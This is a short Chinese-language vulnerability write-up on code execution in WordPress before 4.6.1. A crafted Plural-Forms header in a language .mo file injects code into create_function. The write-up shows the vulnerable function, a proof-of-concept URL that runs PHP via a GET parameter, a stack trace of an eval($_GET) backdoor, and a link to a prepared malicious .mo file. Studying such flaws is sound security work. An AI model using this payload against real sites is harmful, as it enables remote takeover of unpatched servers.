wordpress <4.6.1 语言文件导致的代码执行

1.原因：

create_function的误用

这里可以看到栈调用信息

http://127.0.0.1/wordpress/?c=$e=new%20Exception;%20var_dump($e-%3EgetTraceAsString());;

function make_plural_form_function($nplurals, $expression) {    $expression = str_replace('n', '$n', $expression);    $func_body = "        \$index = (int)($expression);        return (\$index < $nplurals)? \$index : $nplurals - 1;";    return create_function('$n', $func_body);}

修改header头，通过修改语言包mo文件（工具 PoEdit），闭合对应的语句，然后达到代码执行的目的，也可以下载大神修改好的mo自己测试 https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97string(1334) "#0 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171) : runtime-created function(2): eval() #1 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171): create_function('$n', '\n\t\t\t$index = (i...') #2 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(224): Gettext_Translations->make_plural_form_function(1, 'n);}eval($_GET[...') #3 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(62): Gettext_Translations->set_header('Plural-Forms', 'nplurals=1; plu...') #4 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(210): Translations->set_headers(Array) #5 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(27): MO->import_from_reader(Object(POMO_FileReader)) #6 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(342): MO->import_from_file('C:\\xampp\\htdocs...') #7 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(388): load_textdomain('default', 'C:\\xampp\\htdocs...') #8 C:\xampp\htdocs\wordpress\wp-settings.php(268): load_default_textdomain() #9 C:\xampp\htdocs\wordpress\wp-config.php(87): require_once('C:\\xampp\\htdocs...') #10 C:\xampp\htdocs\wordpress\wp-load.php(29): require_once('C:\\xampp\\htdocs...') #11 C:\xampp\htdocs\wordpress\wp-blog-header.php(12): require_once('C:\\xampp\\htdocs...') #12 C:\xampp\htdocs\wordpress\index.php(18): require('C:\\xampp\\htdocs...') #13 {main}"

效果图